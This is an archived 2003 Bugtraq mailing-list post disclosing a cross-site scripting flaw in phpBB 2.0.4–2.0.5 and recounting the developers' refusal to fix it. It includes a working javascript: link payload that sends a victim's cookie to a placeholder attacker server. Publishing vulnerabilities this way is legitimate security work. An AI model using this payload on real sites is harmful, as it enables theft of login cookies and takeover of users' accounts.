lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 18 Aug 2003 21:56:59 +0200
From: Marvin Massih <GroennDemon@....de>
To: bugtraq <bugtraq@...urityfocus.com>
Subject: XSS vulnerability in phpBB


Hi,

I have found a dangerous vunlerability in phpBB.
I've verified that versions 2.0.5 and 2.0.4 (AFAIK the two latest versions)
are affected, but probably more versions are vulnerable.

If HTML is enabled for postings, a user can post a link like this:

<a 
href="javascript:document.location.replace('http://www.evil-server.com/cgi-bin/evil.cgi?stolen_cookie=' 
+ document.cookie);">Click me, I'm innocent</a>

If a user clicks it, his cookie will be sent to the attacker, which he 
can use to log on as the user if autologon is enabled.

I reported this vulnerability to the phpBB developers (which wasn't 
that  easy as they had trouble with their mail server), that was about 
three weeks ago.

However, the developers don't want to fix it:

"The main developer decided that this isn't a security issue, because it 
is not able to re-parse every single allowed html tag. The bbcode tag 
[url] is absolutely suitable for displaying urls, therefore allowing the 
a html tag is a risk the Administrator has to take."

Again, I asked them to fix it, I couldn't believe they were serious.
This time I told them they should do something soon - or at least tell 
me that they're working on it - , otherwise I'd finally publish the 
information.

The response was:

"Actually, after second thoughts I don't see this issue as a security 
flaw on our side, enabling unchecked HTML is taking the same risk as 
allowing users to use <script> tags. I'm in favor of putting a notice 
warning the admin of the potential security risk when enabling given 
tags but trying to fix that on our side will cause more problems that it 
will solve."

So, I'm publishing this information now, hoping that this will help.

AFAIK a new version, 2.0.6 is out now, but as they refused fixing this 
issue I don't know if there is any difference.

Regards,

Marvin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ